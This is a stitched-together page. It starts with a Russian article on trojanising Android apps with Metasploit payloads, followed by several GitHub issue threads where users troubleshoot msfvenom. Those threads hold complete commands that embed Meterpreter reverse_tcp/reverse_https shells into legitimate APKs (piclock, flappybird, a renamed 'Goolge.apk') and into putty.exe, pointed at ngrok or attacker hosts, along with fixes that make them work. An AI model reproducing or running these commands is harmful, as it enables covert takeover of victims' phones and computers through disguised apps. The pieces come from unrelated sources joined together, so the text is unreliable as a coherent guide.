No platform was selected choosing msf module platform android from the payload

Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android — вручную

Большинству приложений Android не хватает достаточной защиты вокруг двоичного файла, и поэтому злоумышленник может легко троянизировать легитимное приложение с вредоносными нагрузками. Это одна из причин того, что мобильное вредоносное ПО так быстро распространяется в телефонах Android.

При оценке безопасности мобильных устройств попытки троянизировать приложение в рамках данной области могут быть полезны в качестве доказательства концепции, демонстрирующей заказчику влияние на репутацию бизнеса, если его приложение можно использовать в злонамеренных целях.

Шаг 1 — Генерация полезной нагрузки
Metasploit MsfVenom может генерировать различные виды полезных нагрузок, и его можно использовать для создания APK-файла, который будет содержать полезную нагрузку Meterpreter.

Создание APK полезной нагрузки через Metasploit

Шаг 2 — декомпилировать APK
Прежде всего необходимо декомпилировать целевое приложение и созданный ранее pentestlab.apk. Это может быть достигнуто с использованием apktool . Следующая команда декомпилирует код и сохраняет его в файлы .smali

Шаг 3 — Внедрение полезных файлов
Файлы полезной нагрузки из pentestlab.apk необходимо скопировать в папку smali, где находится весь код приложения. В частности, две папки:

Шаг 4 — Внедрение тригера
Изучение файла манифеста Android приложения может помочь определить, какое основное действие запускается при открытии приложения. Это необходимо, потому что иначе полезная нагрузка не будет выполнена.

Определение основной деятельности

Следующая строка, которая находится внутри в файле Main Activity, должна быть заменена следующим кодом:

Идентификация заменяемого кода

Следующая строка просто запустит полезную нагрузку metasploit вместе с существующим кодом при запуске действия.

Шаг 5 — Внедрение приложения с разрешениями
Чтобы сделать введенную полезную нагрузку более эффективной, в файл манифеста Android приложения можно добавить дополнительные разрешения, которые дадут больший контроль над телефоном, если пользователь их примет

Добавление разрешений Android

Шаг 6 — Перекомпилируйте приложение
Теперь, когда полезные данные и разрешения добавлены, приложение готово к повторной компиляции в виде APK-файла.

Построение инъецированного APK

Шаг 7 — Подпись APK
Приложения не могут быть установлены на устройстве, если они не подписаны. Ключ отладки Android по умолчанию может быть использован:

С того момента, как приложение будет установлено и запущено на устройстве, откроется сеанс meterpreter.

Meterpreter с помощью встроенного Android APK

Источник

not able to create payload using msf venom #12803

Comments

samrudh1312 commented Jan 9, 2020

hi there i am using windows 10
i have installed metasploit but i am not able to create payload for android

msfvenom -x piclock.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19219 -o /C:/Users/SAMBHRAMA D YASh/Desktop/piclocks.apk
C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/backports-3.15.0/lib/backports/std_lib.rb:9: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
Using APK template: piclock.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/bin/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/bin/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: piclock.apk

this appears on my screen

the apk is saved in my downloads folder

The text was updated successfully, but these errors were encountered:

bcoles commented Jan 17, 2020

Try specifying the full path to piclock.apk .

Error: Invalid template: piclock.apk implies that the file could not be found or is not readable.

samrudh1312 commented Jan 17, 2020

what do u mean by apktool not found ??

bcoles commented Jan 17, 2020

what do u mean by apktool not found ??

I never said apktool not found. Why? Is that what msfvenom says now they you’ve correctly specified the full path to piclock.apk ?

samrudh1312 commented Jan 17, 2020

Yeah after I specified the proper location this is what it came

zahanzo commented Feb 23, 2020 •

as I understand it, you made the wrong exit, whenever you place a place where there is space you should use «\», try this to see if it works:

msfvenom -x piclock.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19219 -o /C:/Users/SAMBHRAMA\ D\ YASh/Desktop/piclocks.apk

samrudh1312 commented Mar 19, 2020

«Error: apktool not found. If it’s not in your PATH, please add it.»
how to add a apktool .

samrudh1312 commented Apr 16, 2020

as I understand it, you made the wrong exit, whenever you place a place where there is space you should use «», try this to see if it works:

msfvenom -x piclock.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19219 -o /C:/Users/SAMBHRAMA\ D\ YASh/Desktop/piclocks.apk

how to add a apktool ?

gwillcox-r7 commented Apr 27, 2020

@samrudh1312 This means that you haven’t installed apktool on your system. You can find the installation instructions for it here: https://ibotpeaches.github.io/Apktool/install/.

Closing this issue as this is no longer a Metasploit specific issue, but rather an issue about install dependencies external to Metasploit; this not the place for these types of questions as GitHub is purely for requesting new features in Metasploit or reporting bugs within it. Please ask on Slack (http://metasploit.slack.com/) or your local community form if you need further help installing apktool .

starbuddy55 commented Jul 7, 2020

msfvenom -x ××××.apk -p android/meterpreter/reverse_tcp LHOST=×××××× LPORT=×××× R > ×××××.apk
Using APK template: Goolge.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: ××××.apk

I tried in both tcp and https method.
Any solutions!?

bcoles commented Jul 7, 2020

msfvenom -x ××××.apk -p android/meterpreter/reverse_tcp LHOST=×××××× LPORT=×××× R > ×××××.apk
Using APK template: Goolge.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: ××××.apk

I tried in both tcp and https method.
Any solutions!?

Did you perhaps mean Google.apk rather than Goolge.apk ? Does Goolge.apk exist?

starbuddy55 commented Jul 10, 2020 •

msfvenom -x ××××.apk -p android/meterpreter/reverse_tcp LHOST=×××××× LPORT=×××× R > ×××××.apk
Using APK template: Goolge.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: ××××.apk
I tried in both tcp and https method.
Any solutions!?

Did you perhaps mean Google.apk rather than Goolge.apk ? Does Goolge.apk exist?

Yes. I renamed the original apk. And i installed apktool and jdk8 the above problem is solved..but new problem arised as below..

msfvenom -x /$HOME/××××.apk -p android/meterpreter/reverse_tcp —platform android —arch dalvik LHOST=my ip LPORT=my port -o x1.apk
Using APK template: //data/data/com.termux/files/home/××××.apk
Error: undefined method `[]’ for nil:NilClass

I tried with Spade tool and also with apktool to decompile and compile. same error occurred:(

Источник

# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.212.12.255 LPORT=4444 -f exe > virus.exe [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 10090 bytes Error: The payload could not be generated, check options #11825

Comments

MohamadSyahrul commented May 8, 2019

why this command failed .

The text was updated successfully, but these errors were encountered:

timwr commented May 8, 2019

Remove the option -f exe .

tomsey0 commented Jun 2, 2020

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Error: Is a directory @ io_fread — /
I am getting this error can anybody help me ?

bcoles commented Jun 2, 2020

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Error: Is a directory @ io_fread — /
I am getting this error can anybody help me ?

Maybe. What commands are you using? Presumably you’re incorrectly specifying the path to a directory.

tomsey0 commented Jun 2, 2020

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Error: Is a directory @ io_fread — /
I am getting this error can anybody help me ?

Maybe. What commands are you using? Presumably you’re incorrectly specifying the path to a directory.

msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 23 -k -x /root/Desktop/putty.exe LHOST=my_ip LPORT=443 > puttyevil.exe 23 -k -x /
putty.exe is already downloaded to my desktop

bcoles commented Jun 3, 2020

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Error: Is a directory @ io_fread — /
I am getting this error can anybody help me ?

Maybe. What commands are you using? Presumably you’re incorrectly specifying the path to a directory.

msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 23 -k -x /root/Desktop/putty.exe LHOST=my_ip LPORT=443 > puttyevil.exe 23 -k -x /
putty.exe is already downloaded to my desktop

You’ve specified -x twice. msfvenom is using the second argument / , trying to use the root directory / as a template executable file, and failing.

Payload to use (—list payloads to list, —list-options for arguments). Specify ‘-‘ or STDIN for custom —list-options List —payload ‘s standard, advanced and evasion options -f, —format

Источник

msfvenom Error: Malformed version number string 2.4.1-dirty #13520

Comments

tejeshbathina commented May 26, 2020

hello,
when i am trying to create a payloaded apk with existing apk with the help of ngrok, i got this kind of error and i searched for this in many websites please help me. here is the code
msfvenom -x flappybird.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19172 -o

Desktop/FlappyBird.apk
Using APK template: flappybird.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.1-dirty
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

please help me out of this

The text was updated successfully, but these errors were encountered:

gwillcox-r7 commented Jun 4, 2020 •

@tejeshbathina I believe this issue has already been reported previously. Try the solutions mentioned at #13231. In particular you may need to run the command with sudo like so:

sudo msfvenom -x flappybird.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19172 -o

You may also need to add -a java —platform android like so:

sudo msfvenom -a java —platform android -x flappybird.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19172 -o

Closing as this is a duplicate of #13231 which has a known solution. If you are still encountering errors, feel free to reopen this issue.

Abhaysoft-inc commented Oct 3, 2020

Not Working There’s a another Error also of Apktool

gwillcox-r7 commented Oct 3, 2020

@Abhaysoft-inc Without an error message its going to be very hard to determine what the issue is. Additionally if the error is within APKTool itself and not within Metasploit, we would not be able to fix it ourselves. If you feel the issue is within Metasploit, please create a new issue using https://github.com/rapid7/metasploit-framework/issues/new/choose and select Bug Report, then fill out the template.

Arceus1031 commented Nov 21, 2020

Not Working There’s a another Error also of Apktool

just type ‘apt install apktool’

hash30 commented Feb 12, 2021

Any solution of this error?

sudo msfvenom -x /root/Desktop/AllTools/hackingapks/hacked.apk -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -o /root/Desktop/AllTools/hackingapks/hacked1.apk
Using APK template: /root/Desktop/AllTools/hackingapks/hacked.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[] Creating signing key and keystore..
[] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen — /tmp/d20210212-15241-1qeknuu/original/AndroidManifest.xml

gwillcox-r7 commented Feb 12, 2021

@hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

hash30 commented Feb 12, 2021

hash30 commented Feb 12, 2021

@hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

hash30 commented Feb 12, 2021

@hash30 Try installing APKTool 2.5.0 or later. I have been testing a lot of these issues and noticed that a lot of the issues were resolved when upgrading to APKTool 2.5.0. If this issue persists let me know.

I tried installing version 2.5.0 as per instructions on official site but got no luck! Any help here? It’s still showing version 2.4.1-dirty 🙁

gwillcox-r7 commented Feb 12, 2021

@hash30 You may need to apt-get uninstall apktool to remove the older version. Its likely that somewhere on your system its defaulting to using the older version.

hash30 commented Feb 13, 2021

@hash30 You may need to apt-get uninstall apktool to remove the older version. Its likely that somewhere on your system its defaulting to using the older version.

Yeah, it worked, Thanks man. I’ve used

apt autoremove apktool -y
to uninstall apktool instead of

apt-get uninstall apktool
Which removed it from my pc. See in picture below

After that i used apktool command in terminal to check the version of apktool which showed the updated version of apktool. See picture below

Note: I’ve had already installed the latest version of apktool as described in this guide before uninstalling the previous version, I’m using kali linux 2020.2 for your info. I described these things to help you understand the process if you’re facing the same problem like i’ve and came here for finding a solution.

Источник